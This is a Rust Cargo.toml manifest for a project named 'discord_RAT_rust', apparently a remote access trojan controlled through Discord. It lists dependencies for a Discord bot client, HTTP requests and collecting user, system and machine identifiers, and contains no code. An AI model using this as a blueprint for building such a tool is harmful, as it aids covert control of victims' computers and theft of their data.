[package]
name = "discord_RAT_rust"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
owo-colors = "3.5.0"
chrono = "0.4"
reqwest = { version = "0.11.12", features = ["json", "blocking"] }
tokio = { version = "1.21.2", features = ["full"] }

serenity = { version = "0.11.5", default-features = true, features = ["client", "gateway", "rustls_backend", "model"] }
whoami = "1.2.3"
sysinfo = "0.26.4"
machine-uid = "0.2.0"
serde_json = "1.0.86"
jsonformat = "2.0.0"
serde = "1.0.145"






